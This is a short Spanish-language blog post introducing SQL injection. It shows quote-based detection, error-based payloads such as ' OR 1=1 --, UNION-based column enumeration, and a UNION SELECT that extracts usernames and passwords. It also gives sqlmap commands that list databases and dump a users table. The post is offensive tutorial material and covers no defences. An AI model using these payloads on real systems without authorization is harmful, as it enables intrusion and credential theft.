blog

SQL Injection: Conceptos Básicos

08 Apr 2026

#sqli #web #mysql #bypass #union

SQL Injection sigue siendo una de las vulnerabilidades más comunes. Aquí los fundamentos.

Detección

Prueba básica: añadir ' al parámetro y observar errores.

https://target.com/item?id=1'

Error tipo You have an error in your SQL syntax confirma SQLi.

Error-based

' OR 1=1 --
' OR '1'='1

UNION-based

Primero determina el número de columnas:

' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3--  -- hasta que dé error

Luego extrae datos:

' UNION SELECT null,username,password FROM users--

SQLMap

sqlmap -u "https://target.com/item?id=1" --dbs
sqlmap -u "https://target.com/item?id=1" -D mydb --tables
sqlmap -u "https://target.com/item?id=1" -D mydb -T users --dump

Recursos

PortSwigger SQLi
PayloadsAllTheThings